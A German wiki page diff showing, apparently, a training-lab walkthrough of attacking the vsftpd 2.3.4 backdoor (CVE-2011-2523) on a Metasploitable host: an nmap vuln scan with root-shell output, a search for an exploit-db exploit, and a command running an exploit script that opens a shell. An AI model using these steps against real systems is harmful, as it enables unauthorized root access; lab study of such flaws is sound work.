Vsftp4-angriff: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(Die Seite wurde neu angelegt: „=Angreifer= ==Scan== *nmap -sV 10.80.100.105 -p 21 Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-07 16:56 CEST Nmap scan report for 10.80.100.105 Host…“) |
(→Scan) |
||
| Zeile 1: | Zeile 1: | ||
=Angreifer= | =Angreifer= | ||
==Scan== | ==Scan== | ||
| − | *nmap -sV 10. | + | *nmap -sV --script vuln 10.0.10.105 -p 21 |
| − | + | <pre> | |
| − | + | Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-27 19:27 CEST | |
| − | + | Nmap scan report for metaspoitable.hack.lab (10.0.10.105) | |
| + | Host is up (0.00088s latency). | ||
| + | |||
| + | PORT STATE SERVICE VERSION | ||
| + | 21/tcp open ftp vsftpd 2.3.4 | ||
| + | | ftp-vsftpd-backdoor: | ||
| + | | VULNERABLE: | ||
| + | | vsFTPd version 2.3.4 backdoor | ||
| + | | State: VULNERABLE (Exploitable) | ||
| + | | IDs: BID:48539 CVE:CVE-2011-2523 | ||
| + | | vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04. | ||
| + | | Disclosure date: 2011-07-03 | ||
| + | | Exploit results: | ||
| + | | Shell command: id | ||
| + | | Results: uid=0(root) gid=0(root) | ||
| + | | References: | ||
| + | | https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb | ||
| + | | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523 | ||
| + | | https://www.securityfocus.com/bid/48539 | ||
| + | |_ http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html | ||
| + | MAC Address: 0C:67:68:58:00:00 (Unknown) | ||
| + | Service Info: OS: Unix | ||
| + | |||
| + | Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | ||
| + | Nmap done: 1 IP address (1 host up) scanned in 12.68 seconds | ||
| + | </pre> | ||
| − | |||
| − | |||
| − | |||
==Nach Exploit googlen== | ==Nach Exploit googlen== | ||
;vsftpd 2.3 4 exploit-db | ;vsftpd 2.3 4 exploit-db | ||
Version vom 27. Oktober 2021, 17:30 Uhr
Angreifer
Scan
- nmap -sV --script vuln 10.0.10.105 -p 21
Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-27 19:27 CEST Nmap scan report for metaspoitable.hack.lab (10.0.10.105) Host is up (0.00088s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 | ftp-vsftpd-backdoor: | VULNERABLE: | vsFTPd version 2.3.4 backdoor | State: VULNERABLE (Exploitable) | IDs: BID:48539 CVE:CVE-2011-2523 | vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04. | Disclosure date: 2011-07-03 | Exploit results: | Shell command: id | Results: uid=0(root) gid=0(root) | References: | https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523 | https://www.securityfocus.com/bid/48539 |_ http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html MAC Address: 0C:67:68:58:00:00 (Unknown) Service Info: OS: Unix Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.68 seconds
Nach Exploit googlen
- vsftpd 2.3 4 exploit-db
Exploit finden
Exploit ausführen
- python vsftp.py 10.80.100.105
Success, shell opened Send `exit` to quit shell